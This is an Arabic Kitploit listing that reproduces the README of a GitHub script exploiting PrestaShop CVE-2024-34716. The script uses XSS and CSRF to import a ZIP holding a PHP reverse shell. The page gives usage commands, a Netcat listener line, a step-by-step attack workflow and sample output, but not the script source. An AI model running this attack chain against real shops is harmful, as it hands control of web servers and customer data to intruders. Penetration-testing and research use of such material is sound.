Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Prestashop-CVE-2024-34716 — نص استغلال CSRF آلي لـ PrestaShop يقوم برفع وتنفيذ قوقعة عكسية PHP عبر حمولة ZIP مصممة، ويتطلب مستمع Netcat لالتقاط الاتصال. | Kitploit
أدوات/GitHubGitHub/0xdtc/prestashop-cve-2024-34716
توليد الحمولةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHub0xdtc/prestashop-cve-2024-34716

Prestashop-CVE-2024-34716

نص استغلال CSRF آلي لـ PrestaShop يقوم برفع وتنفيذ قوقعة عكسية PHP عبر حمولة ZIP مصممة، ويتطلب مستمع Netcat لالتقاط الاتصال.

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

سكربت استغلال CSRF وهجوم الصدفة العكسية

يقوم هذا السكربت بأتمتة استغلال ثغرة CSRF (تزوير الطلب عبر المواقع) لرفع صدفة عكسية PHP على خادم الويب المستهدف وتنفيذها. يتم تسليم الصدفة العكسية كملف ZIP عبر حمولة CSRF مصممة، يتم تفعيلها عندما يتفاعل مستخدم متميز مع نقطة نهاية محددة. يتطلب السكربت وجود مثيل Netcat يستمع لاستقبال اتصال الصدفة العكسية.

يبدو معطلاً الآن وسيتم تحديثه لاحقاً

المتطلبات

  • Netcat: تأكد من تثبيت Netcat ويمكنه الاستماع على منفذ محدد (المنفذ الافتراضي: 9001).
  • Python 3: يُستخدم لتقديم الملفات عبر HTTP.
  • Curl و JQ: يُستخدمان لجلب ومعالجة طلبات HTTP وتحليل JSON.

الاستخدام

root@kitploit:~
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

الوسائط

  • target_url: عنوان URL الأساسي للهدف (مثل https://example.com).
  • admin_endpoint: مسار نقطة نهاية استيراد سمة لوحة الإدارة.
  • admin_email: عنوان بريد إلكتروني لمسؤول (لتزويره في الحمولة).
  • attacker_ip: عنوان IP حيث سيستمع مستمع الصدفة العكسية لاستقبال الاتصال.

مثال

root@kitploit:~
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10

سير عمل الاستغلال

  1. إنشاء الصدفة العكسية: إنشاء صدفة عكسية PHP باستخدام revshells.com مع عنوان attacker_ip المقدم والمنفذ 9001.
  2. تغليف ZIP: يتم ضغط ملف الصدفة العكسية (love.php) إلى Love-exploit.zip.
  3. جلب رمز CSRF: استرداد رمز CSRF من الهدف لتفويض طلب استيراد السمة.
  4. بناء حمولة HTML: إنشاء حمولة HTML (csrf_payload.html) تحتوي على سكريبت JavaScript لإرسال طلب ضار تلقائياً إلى لوحة إدارة الهدف لاستيراد الصدفة العكسية.
  5. إعداد خادم HTTP: خادم HTTP مؤقت على المنفذ 8000 لتقديم ملف Love-exploit.zip للهدف ليستورده.
  6. رفع XSS وتفعيل CSRF: تحميل حمولة CSRF إلى صفحة الاتصال بالهدف. عند الوصول إليها، تُفعّل هجوم CSRF.
  7. مستمع الصدفة العكسية: يراقب المهاجم الاتصالات الواردة من الضحية باستخدام Netcat.

خطوات التنفيذ

  1. ابدأ مستمع Netcat على جهازك:

    root@kitploit:~
    nc -nvlp 9001
    
  2. قم بتشغيل السكربت:

    root@kitploit:~
    ./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
    
  3. انتظر حتى ينفذ الهدف حمولة CSRF ويستقبل اتصال الصدفة العكسية.

المخرجات

يقوم السكربت بإخراج المعلومات التالية أثناء التنفيذ:

  • حالة استرداد رمز CSRF.
  • حالة إنشاء الصدفة العكسية وتغليفها.
  • حالة توصيل الحمولة وحالة خادم HTTP.

ملاحظات مهمة

  • الأذونات: يتطلب هذا السكربت إذناً للتنفيذ على الخادم المستهدف. الاستخدام غير المصرح به غير قانوني ويعاقب عليه القانون.
  • بيئة الاختبار: يُستخدم فقط في بيئة خاضعة للرقابة ومصرح بها، مثل مختبر أمن سيبراني.
  • تعارض المنافذ: تأكد من أن المنافذ 8000 (خادم HTTP) و 9001 (مستمع Netcat) خالية قبل تشغيل السكربت.

مثال على المخرجات

root@kitploit:~
[*] تأكد من أن Netcat يستمع: nc -nvlp 9001
[*] انتظار مستمع netcat...
[*] إنشاء صدفة عكسية PHP...
[*] تغليف الصدفة كـ Love-exploit.zip...
[*] جلب رمز CSRF...
[+] تم استرداد رمز CSRF: <token_value>
[*] بناء حمولة HTML لـ CSRF...
[*] تحويل HTML إلى PNG...
[*] التحقق من وجود خادم HTTP على المنفذ 8000...
[*] بدء خادم HTTP جديد على المنفذ 8000 لتوصيل الحمولة...
[*] رفع حمولة XSS لتفعيل CSRF...
[*] إبقاء السكربت قيد التشغيل لمراقبة الاتصالات الواردة...

هذا المستند مخصص للاستخدام من قبل مختبري الاختراق وباحثي الأمن السيبراني في بيئات خاضعة للرقابة. الاستخدام غير المصرح به لهذه الأداة لأغراض غير قانونية ممنوع منعاً باتاً.


إخلاء مسؤولية

هذا السكربت مخصص للأغراض التعليمية وتقييمات الأمن السيبراني القانونية فقط. الاستخدام غير المصرح به ضد نظام دون إذن غير قانوني ومخالف للمبادئ الأخلاقية.

تنزيل الأداة